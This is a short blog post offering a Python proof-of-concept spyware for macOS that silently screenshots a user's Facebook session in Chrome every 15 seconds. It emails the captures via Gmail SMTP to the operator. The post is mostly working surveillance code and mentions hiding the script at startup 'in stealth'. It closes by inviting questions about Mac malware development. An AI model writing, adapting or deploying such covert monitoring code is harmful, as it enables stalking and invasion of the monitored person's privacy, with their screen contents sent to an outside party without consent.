Mac OSX Spyware – Facebook Activity Monitor
Introduction
This is a simple POC/Program that allows you to monitor a users Facebook session by taking screen captures of it every 15 seconds when the user is active on the site. I recommend using an e-mail specifically for logging a users session because the program will flood your inbox with e-mails. I’m looking at implementing the PIL to compress multiple images into a single GIF image and sending that once every hour, however using PIL requires an external library which is not ideal. Anyway now that I gave you the low down on the program lets take a look at the code!
POC
#!/usr/bin/python """ This program logs a Mac Users Facebook activity and then emails you the screenshot logs once a day. """ #imports import os import sys import subprocess import time import glob from time import gmtime, strftime from AppKit import NSWorkspace import smtplib from email.MIMEMultipart import MIMEMultipart from email.MIMEBase import MIMEBase from email.MIMEText import MIMEText from email import Encoders #gmail login information, replace with your own gmail_user = "ianmarmour@gmail.com" gmail_pwd = "XXXXXXXXXXX" #Insert function here to register the script to run at startup in stealth, simple using applescript. #Main while loop, runs all functions of the program. while 1: #checks for the open tab in Google Chrome using Applescript opentab = os.popen("osascript -e \'tell application \"Google Chrome\" to get URL of active tab of window 1\'").read() facebook = "facebook" decision = opentab.find(facebook) activeAppName = NSWorkspace.sharedWorkspace().activeApplication()['NSApplicationName'] #determines if you have facebook and google chrome open and in focus if (decision != -1) and (activeAppName == "Google Chrome"): time1 = strftime("%Y-%m-%d") time2 = strftime("%H:%M:%S") timestamp = "Facebook_at_" + time1 + "_" + time2 + ".png" #Takes a screencapture with the timestamp of your Facebook Session os.system("screencapture -x " + timestamp) time.sleep(15) #Sends E-Mail using your G-Mail credentials, with the screenshot as an attachment. def mail(to, subject, text, attach): msg = MIMEMultipart() msg['From'] = gmail_user msg['To'] = to msg['Subject'] = subject msg.attach(MIMEText(text)) part = MIMEBase('application', 'octet-stream') part.set_payload(open(attach, 'rb').read()) Encoders.encode_base64(part) part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(attach)) msg.attach(part) mailServer = smtplib.SMTP("smtp.gmail.com", 587) mailServer.ehlo() mailServer.starttls() mailServer.ehlo() mailServer.login(gmail_user, gmail_pwd) mailServer.sendmail(gmail_user, to, msg.as_string()) # Should be mailServer.quit(), but that crashes... mailServer.close() mail("ianmarmour@gmail.com", "Hello from python!", "This is a email sent with python", timestamp ) continue
If you have any questions regarding Mac OSX Malware development using Python feel free to contact me at ianmarmour@gmail.com or send me a direct message on Twitter using @ianmarmour!!!